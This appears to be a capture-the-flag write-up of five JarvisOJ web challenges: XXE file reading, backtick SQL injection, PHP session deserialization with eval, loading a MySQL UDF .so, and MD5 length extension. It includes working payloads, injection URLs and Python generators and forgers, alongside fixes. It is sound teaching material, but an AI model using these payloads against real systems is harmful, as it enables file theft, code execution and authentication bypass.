- Contents
- XXE external entity injection
- Backtick injection
- PHP session deserialization injection
- MySQL: loading a .so file (UDF)
- Hash length extension attack
- XXE external entity injection
Challenge link:
http://web.jarvisoj.com:9882/
Challenge source:
function XHR() {
var xhr;
try {xhr = new XMLHttpRequest();}
catch(e) {
var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
for (var i=0,len=IEXHRVers.length;i< len;i++) {
try {xhr = new ActiveXObject(IEXHRVers[i]);}
catch(e) {continue;}
}
}
return xhr;
}
function send(){
evil_input = document.getElementById("evil-input").value;
var xhr = XHR();
xhr.open("post","/api/v1.0/try",true);
xhr.onreadystatechange = function () {
if (xhr.readyState==4 && xhr.status==201) {
data = JSON.parse(xhr.responseText);
tip_area = document.getElementById("tip-area");
tip_area.value = data.task.search+data.task.value;
}
};
xhr.setRequestHeader("Content-Type","application/json");
xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
The code sends an asynchronous AJAX POST.
I only learned from a write-up that this is an XXE (XML external entity) injection.
I had not seen it before, so I am writing this post to record it.
First, submit an arbitrary value, 123.
The resulting request is:
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://web.jarvisoj.com:9882/
Content-Length: 30
Cookie: UM_distinctid=1633abd2b6a7df-048c43202bcb36-1269624a-1fa400-1633abd2b6c1100
Connection: keep-alive
{"search":"123","value":"own"}
The response is:
HTTP/1.0 201 CREATED
Content-Type: application/json
Content-Length: 80
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Wed, 18 Jul 2018 08:17:06 GMT
{
"task": {
"done": false,
"search": "123",
"value": "own"
}
}
None of that matters for the challenge itself.
Since this is an XXE injection, the first step is to change the request's Content-Type: application/json to Content-Type: application/xml.
I found, however, that the read succeeds as long as the Content-Type is anything other than application/json; I would suggest fixing the backend code so that it only accepts the types it expects.
Now we construct an XML document.
First, the XML declaration:
<?xml version="1.0" ?>
The challenge says the flag is in /home/ctf/flag.txt on the target machine.
So we can make the server's parser read flag.txt for us by declaring an external entity that points at that file:
<!DOCTYPE a [
<!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>
The complete XML document:
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>
<c>&b;</c>
The response:
<c>CTF{XxE_15_n0T_S7range_Enough}
</c>
Fixes:
PHP:
libxml_disable_entity_loader(true);
(Since PHP 8.0 this function is deprecated because libxml 2.9+ no longer loads external entities by default; on older versions keep the call, and never pass LIBXML_NOENT when loading untrusted XML.)
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
(On its own this is not a reliable defense. The recommended setting is dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true), which rejects any document that carries a DOCTYPE and therefore any entity declaration.)
Python:
from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
Others:
XML External Entity (XXE) Prevention Cheat Sheet (OWASP)
Filtering keywords such as SYSTEM or <!ENTITY is at best a secondary measure (encodings and parameter entities get around naive filters); disabling DTD processing in the parser is the real fix.
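As an added example, not part of the original write-up or of the challenge's own code, the following Python models both the behaviour observed above and the fix. The server is Werkzeug/Python, so the standard-library SAX (expat) parser stands in for whatever XML library the challenge actually used (an assumption). xxe_payload builds the document shown above with the target path as a parameter, handle_try models /api/v1.0/try the way the write-up describes it (JSON when the Content-Type says so, otherwise XML), and the hardened path accepts only declared XML types and refuses any DOCTYPE. The "flag" is a constructed temporary file, not /home/ctf/flag.txt.

```python
import json
import os
import tempfile
import xml.sax
from io import BytesIO
from xml.sax.handler import ContentHandler, feature_external_ges


def xxe_payload(path: str) -> bytes:
    """The document from the write-up, parameterised on the file to read."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE a [\n<!ENTITY b SYSTEM "{path}">\n]>\n'
        "<c>&b;</c>"
    ).encode()


class _TextCollector(ContentHandler):
    """Collects character data; the expanded entity arrives here as text."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_xml(body: bytes, resolve_external: bool) -> str:
    """Parse with the stdlib expat-based SAX parser and return the document's text content.

    resolve_external=True reproduces the vulnerable server: a SYSTEM entity is
    fetched (here from the local filesystem) and its contents are expanded.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(BytesIO(body))
    return "".join(handler.parts).strip()


def safe_parse_xml(body: bytes) -> str:
    """Hardened variant: no DOCTYPE means no entity declarations at all."""
    if b"<!DOCTYPE" in body:
        raise ValueError("DOCTYPE/DTD not allowed")
    return parse_xml(body, resolve_external=False)


def handle_try(content_type: str, body: bytes, hardened: bool = False) -> dict:
    """Model of /api/v1.0/try. The write-up found that anything other than
    application/json was parsed as XML; the hardened branch allow-lists instead."""
    if content_type == "application/json":
        search = json.loads(body)["search"]
    elif hardened:
        if content_type not in ("application/xml", "text/xml"):
            raise ValueError("unsupported Content-Type")
        search = safe_parse_xml(body)
    else:
        search = parse_xml(body, resolve_external=True)
    return {"task": {"done": False, "search": search, "value": "own"}}


def demo(flag_text: str = "CTF{constructed-flag}") -> dict:
    """Write a constructed flag file, then push the payload through both handlers."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(flag_text + "\n")
    try:
        payload = xxe_payload(path)
        vulnerable = handle_try("application/xml", payload)["task"]["search"]
        try:
            handle_try("application/xml", payload, hardened=True)
            hardened = "parsed"
        except ValueError as exc:
            hardened = f"rejected: {exc}"
        return {"vulnerable": vulnerable, "hardened": hardened}
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

The vulnerable branch returns the file contents exactly as the challenge did; the hardened branch rejects the document before the parser ever sees the entity declaration, which is the same strategy as disallow-doctype-decl in Java or defusedxml in Python.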
References:
未知攻焉知防——XXE漏洞攻防 (XXE attack and defence)
XXE注入攻击与防御 (XXE injection attacks and defences)
【XXE】XXE漏洞攻击与防御 (XXE vulnerability attacks and defences)
- Backtick injection
Challenge link:
http://web.jarvisoj.com:32794/
Challenge source:
<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>
The challenge hints that the source is available, so run a scanner over it;
the source was recovered from the editor backup file index.php~.
The key lines are
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$table is interpolated into both statements, so there is an injection.
The first statement wraps the name in backticks, so I looked up how MySQL treats them.
Local tests:
1. desc `aaa` `bbb`
2. desc aaa bbb
3. desc 'aaa' 'bbb'
1 and 2 behave the same way; 3 fails.
(MySQL's syntax is DESC tbl_name [col_name | wild], so the second identifier is taken as a column name or pattern; an unknown column just yields an empty result rather than an error, which is why the check never calls Hacker().)
In a SELECT, a second identifier after a table name is an alias, so the statements above correspond to:
1. select * from user bbb where bbb.id = 1
2. select * from `user` `bbb` where bbb.id = 1
So we can construct
desc `test` `union select 1`
In the DESC statement the injected text becomes the quoted column argument and passes. In the second statement, where the name is not quoted, the query becomes select 'flag{xxx}' from secret_test` `union select 1: the backtick-quoted single space is parsed as the table alias and everything after it is appended as a UNION. Only $ret[0] is printed, so LIMIT 1,2 skips the first row ('flag{xxx}') and returns the first row of the injected SELECT.
Database name: 61d300
http://web.jarvisoj.com:32794?table=test` `union select database() limit 1,2
Table names: secret_flag, secret_test (0x363164333030 is 61d300 in hex, so no quotes are needed in the WHERE clause)
http://web.jarvisoj.com:32794?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=0x363164333030 limit 1,2
Column name: flagUwillNeverKnow (0x7365637265745f666c6167 is secret_flag)
http://web.jarvisoj.com:32794?table=test` `union select group_concat(column_name) from information_schema.columns where table_name=0x7365637265745f666c6167 limit 1,2
The flag: flag{luckyGame~}
http://web.jarvisoj.com:32794?table=test` `union select flagUwillNeverKnow from secret_flag limit 1,2
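To see the alias trick work offline, here is an added example (not from the write-up or the challenge) that replays the PHP string interpolation against an in-memory SQLite database. The schema is constructed from the names recovered above; the real one is unknown. SQLite has no DESC statement, so the first check is not modelled, and the injected string uses union all rather than the page's union because SQLite's UNION (distinct) emits its rows in sorted order, which would swap the two rows; MySQL returns them in order as the write-up shows. The fix shown is an identifier allow-list, which is what the challenge's Filter() should have done.

```python
import re
import sqlite3

# Constructed stand-in for the challenge database (assumption: only the names are known).
SCHEMA = """
CREATE TABLE secret_test (id INTEGER);
INSERT INTO secret_test VALUES (1);
CREATE TABLE secret_flag (flagUwillNeverKnow TEXT);
INSERT INTO secret_flag VALUES ('flag{luckyGame~}');
"""

# The same input the write-up sends, with union all for SQLite (see lead-in).
INJECTION = "test` `union all select flagUwillNeverKnow from secret_flag limit 1,2"


def build_query(table: str) -> str:
    """Mirror the PHP: $sql = "select 'flag{xxx}' from secret_{$table}"; (no quoting at all)."""
    return f"select 'flag{{xxx}}' from secret_{table}"


def first_cell(table: str):
    """Execute the interpolated query and return what the PHP echoes as $ret[0].

    With INJECTION the statement is
      select 'flag{xxx}' from secret_test` `union all select ... limit 1,2
    where the quoted single space is the alias of secret_test and LIMIT 1,2
    skips the 'flag{xxx}' row.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    try:
        row = conn.execute(build_query(table)).fetchone()
    finally:
        conn.close()
    return row[0] if row else None


def is_valid_table(table: str) -> bool:
    """Allow-list: MySQL identifiers are at most 64 characters; we permit only [A-Za-z0-9_]."""
    return re.fullmatch(r"[A-Za-z0-9_]{1,64}", table) is not None


def first_cell_safe(table: str):
    """Fixed version: reject anything that is not a plain identifier before interpolating."""
    if not is_valid_table(table):
        raise ValueError("invalid table name")
    return first_cell(table)


if __name__ == "__main__":
    print(build_query(INJECTION))
    print(first_cell("test"), first_cell(INJECTION))
```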
- PHP session deserialization injection
Challenge link:
http://web.jarvisoj.com:32784/
Challenge source:
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
The challenge hints at phpinfo, so try phpinfo.php:
http://web.jarvisoj.com:32784/phpinfo.php
It reveals the document root, /opt/lampp/htdocs.
For the PHP session deserialization technique see: 有趣的php反序列化总结 (an overview of PHP deserialization tricks). The thing to check in phpinfo is session.serialize_handler: the script forces it to php, whose storage format is key|serialized_value, while the session.upload_progress data is written by the handler configured in php.ini (php_serialize here). When the script then reads the session with the php handler, whatever follows the first | is passed to unserialize(), and OowoO::__destruct() runs eval() on the mdzz property.
First create a local test.html:
<form action="http://web.jarvisoj.com:32784/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>
The captured upload request is:
-----------------------------306841150525235
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
123
-----------------------------306841150525235
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------306841150525235--
The filename parameter is where the payload goes; the inner double quotes are backslash-escaped because filename= is itself a quoted parameter.
First list the document root:
filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:39:\"print_r(scandir(\"/opt/lampp/htdocs/\"));\";}"
Result:
Array
(
[0] => .
[1] => ..
[2] => Here_1s_7he_fl4g_buT_You_Cannot_see.php
[3] => index.php
[4] => phpinfo.php
)
Here_1s_7he_fl4g_buT_You_Cannot_see.php stands out; the flag is presumably in it, so read the file:
filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:73:\"show_source(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\");\";}"
That yields the flag:
"CTF{4d96e37f4be998c50aa586de4ada354a}"
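The length fields (s:39, s:73) are the usual place hand-written payloads break, so here is an added Python helper (not part of the write-up) that generates the OowoO payload for any PHP snippet, verifies the byte counts of an existing payload, and rebuilds the multipart body captured above with the quotes escaped the way the filename parameter requires. Class and property names are the challenge's; the boundary string is constructed.

```python
import re


def php_serialize_object(class_name: str, props: dict) -> str:
    """Serialize an object whose properties are all strings, PHP-style.

    Lengths are byte counts (PHP strings are byte strings), which is what
    goes wrong in hand-written payloads as soon as non-ASCII text appears.
    """
    body = "".join(
        f's:{len(k.encode())}:"{k}";s:{len(v.encode())}:"{v}";'
        for k, v in props.items()
    )
    return f'O:{len(class_name.encode())}:"{class_name}":{len(props)}:{{{body}}}'


def session_payload(php_code: str) -> str:
    """Value for the `php` session handler (key|serialized-value): the part after
    the first | is unserialized, and OowoO::__destruct() evals mdzz."""
    return "|" + php_serialize_object("OowoO", {"mdzz": php_code})


def check_lengths(serialized: str) -> bool:
    """Verify every s:N:"..." field: exactly N bytes must be followed by the closing quote and ;."""
    data = serialized.encode()
    pattern = re.compile(rb's:(\d+):"')
    pos = 0
    while True:
        m = pattern.search(data, pos)
        if m is None:
            return True
        end = m.end() + int(m.group(1))
        if data[end:end + 2] != b'";':
            return False
        pos = end + 2


def multipart_body(payload: str, boundary: str = "----constructed-boundary") -> bytes:
    """Rebuild the captured request: the PHP_SESSION_UPLOAD_PROGRESS field plus a file
    part whose filename carries the payload. Double quotes inside filename= are
    backslash-escaped because the parameter value is itself double-quoted."""
    escaped = payload.replace('"', '\\"')
    return (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"\r\n\r\n'
        "123\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{escaped}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        "\r\n"
        f"--{boundary}--\r\n"
    ).encode()


# The two snippets used in the write-up.
SCANDIR = 'print_r(scandir("/opt/lampp/htdocs/"));'
SHOW_FLAG = 'show_source("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php");'

if __name__ == "__main__":
    for code in (SCANDIR, SHOW_FLAG):
        print(session_payload(code))
```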
- MySQL: loading a .so file (UDF)
Challenge link:
https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172
When I first got this challenge I had no idea what to do; only after reading a write-up did I learn that this kind of thing is possible.
First, wget the file into MySQL's plugin directory (the path reported by show variables like 'plugin_dir'; CREATE FUNCTION ... SONAME only loads shared objects from there).
/usr/lib/mysql/plugin# wget https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172
The challenge mentions a help_me function, so create it (the exported symbol names of an unknown UDF can also be listed with nm -D on the .so):
mysql> create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
The output:
mysql> select help_me();
+---------------------------------------------+
| help_me() |
+---------------------------------------------+
| use getflag function to obtain your flag!!
|
+---------------------------------------------+
1 row in set (0.00 sec)
It points to getflag; repeat the same steps:
mysql> create function getflag returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
Query OK, 0 rows affected (0.01 sec)
mysql> select getflag();
+------------------------------------------+
| getflag() |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function}
|
+------------------------------------------+
1 row in set (0.00 sec)
- Hash length extension attack
Challenge link:
http://web.jarvisoj.com:32778/
Challenge source:
<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
body {
background:gray;
text-align:center;
}
</style>
</head>
<body>
<?php
$auth = false;
$role = "guest";
$salt =
if (isset($_COOKIE["role"])) {
$role = unserialize($_COOKIE["role"]);
$hsh = $_COOKIE["hsh"];
if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
$auth = true;
} else {
$auth = false;
}
} else {
$s = serialize($role);
setcookie('role',$s);
$hsh = md5($salt.strrev($s));
setcookie('hsh',$hsh);
}
if ($auth) {
echo "<h3>Welcome Admin. Your flag is
} else {
echo "<h3>Only Admin can see the flag!!</h3>";
}
?>
</body>
</html>
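The post stops at the source, so here is the attack against that check, as an added Python example (not part of the original write-up). The server hands out role=s:5:"guest"; and hsh=md5($salt . strrev(role)), and accepts any role cookie whose unserialize() result is "admin" and whose hsh matches. MD5 is a Merkle-Damgard hash: from a digest and the length of the hashed message you can compute md5(message || glue || suffix) without knowing $salt, where glue is the padding MD5 itself would have appended. Choosing suffix = strrev('s:5:"admin";') makes the reversed server message, which is the cookie, start with s:5:"admin";, and PHP's unserialize stops after the first complete value (before 8.3 it ignores trailing bytes silently; 8.3 warns but still returns the value). The salt length is not on the page, so salt_len is a parameter here; against the live target one would try plausible lengths. The salt in verify_forgery is constructed so the forgery can be checked offline; hashlib is used only for that check, since it cannot resume from a given state.

```python
import hashlib
import math
import struct
from urllib.parse import quote

# --- minimal MD5 that can resume from a known digest -------------------------
_INIT = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def _compress(state, block):
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & 0xFFFFFFFF
        a, d, c = d, c, b
        b = (b + _rotl(f, _S[i])) & 0xFFFFFFFF
    return tuple((x + y) & 0xFFFFFFFF for x, y in zip(state, (a, b, c, d)))


def md5_pad(msg_len: int) -> bytes:
    """Padding MD5 appends to a message of msg_len bytes (0x80, zeros, 64-bit LE bit length)."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack("<Q", (msg_len * 8) % 2 ** 64)


def _md5_resume(state, data: bytes, total_len: int) -> str:
    """Continue hashing `data` from `state`; total_len is the length of everything hashed, data included."""
    buf = data + md5_pad(total_len)
    for off in range(0, len(buf), 64):
        state = _compress(state, buf[off:off + 64])
    return struct.pack("<4I", *state).hex()


def md5_hex(data: bytes) -> str:
    return _md5_resume(_INIT, data, len(data))


def md5_length_extend(digest_hex: str, known_len: int, suffix: bytes):
    """Given md5(secret||known) and len(secret||known), return (glue, md5(secret||known||glue||suffix))."""
    glue = md5_pad(known_len)
    state = struct.unpack("<4I", bytes.fromhex(digest_hex))
    return glue, _md5_resume(state, suffix, known_len + len(glue) + len(suffix))


# --- the challenge ------------------------------------------------------------
def forge_admin(guest_cookie: bytes, guest_hsh: str, salt_len: int):
    """Turn the server-issued guest pair into an admin pair for an assumed salt length.

    Server message is salt || strrev(cookie). We extend the known message with
    strrev('s:5:"admin";'), so the new cookie (reversed message without the salt)
    is 's:5:"admin";' || strrev(glue) || 's:5:"guest";'.
    """
    known = guest_cookie[::-1]                      # strrev in PHP
    suffix = b's:5:"admin";'[::-1]
    glue, new_hsh = md5_length_extend(guest_hsh, salt_len + len(known), suffix)
    return (known + glue + suffix)[::-1], new_hsh


def cookie_header(cookie: bytes, hsh: str) -> str:
    """Glue holds 0x80 and NUL bytes, so the cookie must be percent-encoded; PHP decodes $_COOKIE."""
    return f"Cookie: role={quote(cookie, safe='')}; hsh={hsh}"


def verify_forgery(salt: bytes) -> bool:
    """Replay the PHP check locally with a constructed salt."""
    guest_cookie = b's:5:"guest";'                  # serialize("guest")
    guest_hsh = hashlib.md5(salt + guest_cookie[::-1]).hexdigest()
    cookie, hsh = forge_admin(guest_cookie, guest_hsh, len(salt))
    accepted = hashlib.md5(salt + cookie[::-1]).hexdigest() == hsh
    return accepted and cookie.startswith(b's:5:"admin";')


def md5_matches_hashlib() -> bool:
    return all(md5_hex(b"a" * n) == hashlib.md5(b"a" * n).hexdigest()
               for n in (0, 1, 55, 56, 63, 64, 65, 200))


if __name__ == "__main__":
    salt = b"constructed-secret-salt"
    cookie, hsh = forge_admin(b's:5:"guest";', hashlib.md5(salt + b';"tseug":5:s').hexdigest(), len(salt))
    print(cookie_header(cookie, hsh), verify_forgery(salt))
```

Against the real service the loop is: read the role and hsh cookies from a fresh response, call forge_admin for each candidate salt_len, send the resulting header, and stop when the page no longer says "Only Admin can see the flag!!".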